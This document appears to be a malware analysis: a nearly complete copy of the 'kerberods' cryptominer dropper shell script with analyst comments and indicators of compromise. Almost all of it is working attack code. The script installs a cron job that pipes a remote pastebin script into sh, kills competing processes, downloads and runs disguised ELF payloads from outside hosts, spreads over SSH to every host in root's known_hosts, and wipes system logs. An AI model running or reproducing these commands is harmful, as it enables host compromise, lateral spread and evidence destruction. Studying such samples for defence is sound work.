"kerberods" malware analysis
### Remediation reference (analyst note: understood to apply to the original sample, not to variants)
## https://laucyun.com/17e194c26e4554cab975aae760bad553.html
## https://git.laucyun.com/.../blob/master/clear_kerberods.sh
# Stages used by the dropper (analyst index of the pastebin URLs). The three
# numbered lines below are notes, not shell, and would fail if this file were run as-is.
1: http://pastebin.com/raw/wR3ETdbi # URL observed to change; treat as unstable
2: https://pastebin.com/raw/Zk7Jv9j2
3: https://pastebin.com/raw/0Sxacvsh > GOTO 2
# Make sure /tmp exists and is world-writable with the sticky bit set (mode 1777).
mkdir -p /tmp
chmod 1777 /tmp
# Persistence: `crontab -` REPLACES the invoking user's whole crontab with a single
# entry that re-fetches stage 3 every 15 minutes and pipes it straight into sh.
# IR note: any pre-existing cron entries of that user are lost; a crontab that
# consists only of this curl||wget line is a strong indicator of this infection.
echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh" | crontab -
# Competitor / prior-infection cleanup: each line SIGKILLs every process whose full
# `ps -ef` line contains the given substring. Nothing is anchored, so short patterns
# such as "xmr" or "xig" can also hit unrelated processes on the host.
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "plfsbce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "luyybce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
# Same idea keyed on network peers: column 7 of `netstat -anp` is the PID/Program
# field, the sed strips the "/name" part, and every process with a connection
# involving these two IPs is killed. Both IPs are usable as network IoCs.
netstat -anp|grep 119.9.106.27|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 104.130.210.206|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
# Writable-directory probe: each `touch … && cd …` only changes directory when the
# marker file could be created, so the shell ends up in the LAST writable one of
# /tmp, /usr/local/bin, /usr/libexec, /usr/bin (typically /usr/bin when run as
# root). The marker files are removed again afterwards.
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
# Payload download and execution
# https://ko.wikipedia.org/wiki/ELF_%ED%8C%8C%EC%9D%BC_%ED%98%95%EC%8B%9D
# Appends the directory chosen above to PATH so that the bare name `kerberods`
# in the launch chain further down resolves there.
export PATH=$PATH:$(pwd)
# /tmp/.XIMunix is used as a PID file: the payload is only (re)downloaded when the
# marker is missing or the PID it contains has no /proc/<pid>/io entry, i.e. the
# previous instance is no longer running.
if [ ! -f "/tmp/.XIMunix" ] || [ ! -f "/proc/$(cat /tmp/.XIMunix)/io" ]; then
  # Clear the immutable attribute before deleting any earlier copy in the cwd.
  chattr -i kerberods
  rm -rf kerberods
  ARCH=$(uname -m)
  # Analyst note: suspected decryptor/loader — the ".jpg" served at this URL
  # starts with an ELF header, not image data.
  # - http://1.z9ls.com/t6/701/1555396475x2918527158.jpg
  # Per-architecture binaries (all saved as "kerberods") ################## core part
  # x86_64x
  # - https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg
  # i686x
  # - https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg
  # The trailing "x" on both sides keeps the test well-formed if ARCH is empty.
  if [ ${ARCH}x = "x86_64x" ]; then
    # First-success chain: curl, then wget, against the primary host, then the same
    # pair against the mirror; chmod +x only runs if one of the downloads succeeded.
    (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -O kerberods) && chmod +x kerberods
  elif [ ${ARCH}x = "i686x" ]; then
    (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
  else
    # Any other architecture falls back to the i686 payload.
    (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
  fi
  # Launch: the || chain stops at the first candidate location that executes successfully.
  $(pwd)/kerberods || /usr/bin/kerberods || /usr/libexec/kerberods || /usr/local/bin/kerberods || kerberods || ./kerberods || /tmp/kerberods
fi
# Lateral spread over SSH: if root has a key pair and a known_hosts file, every IPv4
# literal found in known_hosts is contacted non-interactively (BatchMode, host-key
# checking disabled) and told to fetch stage 3 and pipe it into sh. Hostnames are not
# matched by the regex, and hashed known_hosts entries generally yield nothing.
# Detection: a burst of outbound ssh sessions from root to many peers in a short window.
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh >/dev/null 2>&1 &' & done
fi
# Anti-forensics: in `echo 0>FILE` the `0` is parsed as the file-descriptor number of
# the redirection, not as echo's argument, so each file is opened for writing and
# truncated to zero bytes (echo itself just prints a bare newline to stdout).
# IR note: zero-length wtmp/secure/cron logs and root mailbox with a fresh mtime.
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron